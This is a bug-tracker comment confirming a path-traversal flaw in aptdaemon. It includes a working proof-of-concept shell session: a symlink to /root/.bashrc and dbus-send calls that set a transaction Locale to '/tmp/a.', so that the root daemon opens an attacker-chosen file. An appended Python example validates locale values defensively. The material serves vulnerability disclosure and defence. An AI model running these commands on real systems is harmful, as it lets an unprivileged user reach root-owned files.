Comment 2 for bug 1888235

Alex Murray (alexmurray) wrote :

Yes, I can confirm this is an issue and is quite similar to CVE-2015-1323 - like in https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587, a simple bash example via dbus-send is enough to demonstrate this:

$ mkdir -p /tmp/a/LC_MESSAGES
$ ln -s /root/.bashrc /tmp/a/LC_MESSAGES/aptdaemon.mo
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile \
    string:/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb \
    boolean:false
method return time=1595299798.945425 sender=:1.194 -> destination=:1.193 serial=7 reply_serial=2
   string "/org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156"
$ dbus-send --print-reply --system --dest=org.debian.apt /org/debian/apt/transaction/51f737bf25f14db7be88bdc5139ea156 org.freedesktop.DBus.Properties.Set string:org.debian.apt.transaction string:Locale string:/tmp/a.
Error org.freedesktop.DBus.Python.OSError: Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/policykit1.py", line 152, in get_uid_from_dbus_name
    return_value(uid)
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 462, in return_value
    raise _DefGen_Return(val)
defer._DefGen_Return: 1000

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks
    result = gen.send(result)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property
    self._set_locale(value)
  File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 835, in _set_locale
    self._translation = gettext.translation("aptdaemon",
  File "/usr/lib/python3.8/gettext.py", line 613, in translation
    t = _translations.setdefault(key, class_(fp))
  File "/usr/lib/python3.8/gettext.py", line 261, in __init__
    self._parse(fp)
  File "/usr/lib/python3.8/gettext.py", line 393, in _parse
    raise OSError(0, 'Bad magic number', filename)
OSError: [Errno 0] Bad magic number: '/tmp/a/LC_MESSAGES/aptdaemon.mo'

Can you confirm if this has been reported elsewhere and whether a CVE has already been assigned for this issue (via MITRE or some other CVE Naming Authority)?
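
Added example, not part of the comment above and not aptdaemon's own code or fix: one way a privileged service could vet a caller-supplied Locale value before any translation catalogue is opened. The names LOCALE_DIR, LOCALE_RE, catalogue_path and safe_catalogue_path, and the /usr/share/locale root, are assumptions made for illustration.

```python
import os
import re

LOCALE_DIR = "/usr/share/locale"  # assumed catalogue root
DOMAIN = "aptdaemon"

# language[_TERRITORY][.codeset][@modifier]; a "/" can never match.
LOCALE_RE = re.compile(
    r"(?P<lang>[A-Za-z]{2,3})(?P<terr>_[A-Za-z]{2})?"
    r"(?:\.[A-Za-z0-9-]+)?(?P<mod>@[A-Za-z0-9]+)?\Z"
)


def catalogue_path(lang, localedir=LOCALE_DIR, domain=DOMAIN):
    """Path a gettext-style lookup derives from a language string.

    os.path.join discards localedir when lang is absolute, so "/tmp/a"
    yields /tmp/a/LC_MESSAGES/aptdaemon.mo, the file named in the
    traceback above.
    """
    return os.path.join(localedir, lang, "LC_MESSAGES", domain + ".mo")


def safe_catalogue_path(value, localedir=LOCALE_DIR, domain=DOMAIN):
    """Validate a caller-supplied locale, then confine the resolved file."""
    m = LOCALE_RE.match(value)
    if m is None:
        raise ValueError("rejected locale: %r" % (value,))
    # Rebuild the directory name from validated parts only (codeset dropped).
    lang = m.group("lang") + (m.group("terr") or "") + (m.group("mod") or "")
    root = os.path.realpath(localedir)
    real = os.path.realpath(catalogue_path(lang, localedir, domain))
    # realpath follows symlinks, so a link that leaves the root is refused too.
    if os.path.commonpath([root, real]) != root:
        raise ValueError("catalogue resolves outside %s" % root)
    return real
```

The pattern check rejects the `/tmp/a.` value from the session above before any path is built; the realpath comparison is a second layer for symlinks placed inside the catalogue tree.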